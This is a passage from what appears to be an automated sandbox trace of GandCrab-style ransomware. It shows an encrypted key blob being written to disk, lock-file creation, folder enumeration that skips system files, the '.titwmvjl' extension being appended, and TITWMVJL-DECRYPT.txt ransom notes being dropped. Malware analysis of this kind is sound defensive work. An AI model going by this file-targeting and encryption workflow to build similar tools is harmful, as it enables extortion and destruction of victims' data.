4\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.061] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0095.061] CloseHandle (hObject=0x230) returned 1 [0095.062] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.062] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.062] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x171)) [0095.062] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.062] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.062] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.062] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned 58 [0095.062] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\saved games\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.069] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.069] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\") returned 34 [0095.069] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\*" [0095.069] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5035b8 [0095.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.070] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.070] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.070] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.070] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.070] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a09d2ca4deb61a.lock" [0095.071] lstrlenW (lpString=".titwmvjl") returned 9 [0095.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned 58 [0095.071] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.071] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 67 [0095.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned 58 [0095.071] lstrlenW (lpString=".lock") returned 5 [0095.071] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.071] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.071] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.071] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.071] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.071] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0095.071] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0095.071] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini" [0095.072] lstrlenW (lpString=".titwmvjl") returned 9 [0095.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned 45 [0095.072] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.072] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini.titwmvjl") returned 54 [0095.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned 45 [0095.072] lstrlenW (lpString=".ini") returned 4 [0095.072] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.072] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0095.072] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0095.072] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned 45 [0095.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\desktop.ini") returned 45 [0095.072] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0095.072] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.072] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.072] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.072] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.073] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\TITWMVJL-DECRYPT.txt" [0095.073] lstrlenW (lpString=".titwmvjl") returned 9 [0095.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 54 [0095.073] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.073] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 63 [0095.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 54 [0095.073] lstrlenW (lpString=".txt") returned 4 [0095.073] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.073] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.073] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.073] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 54 [0095.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 54 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.073] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.074] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0095.074] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0095.074] CloseHandle (hObject=0x230) returned 1 [0095.074] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.074] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0095.074] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0095.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Searches" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches" [0095.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Searches\\" [0095.074] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.075] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.076] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.076] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Searches\\\\TITWMVJL-DECRYPT.txt") returned 52 [0095.076] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Searches\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\searches\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0095.077] lstrlenW 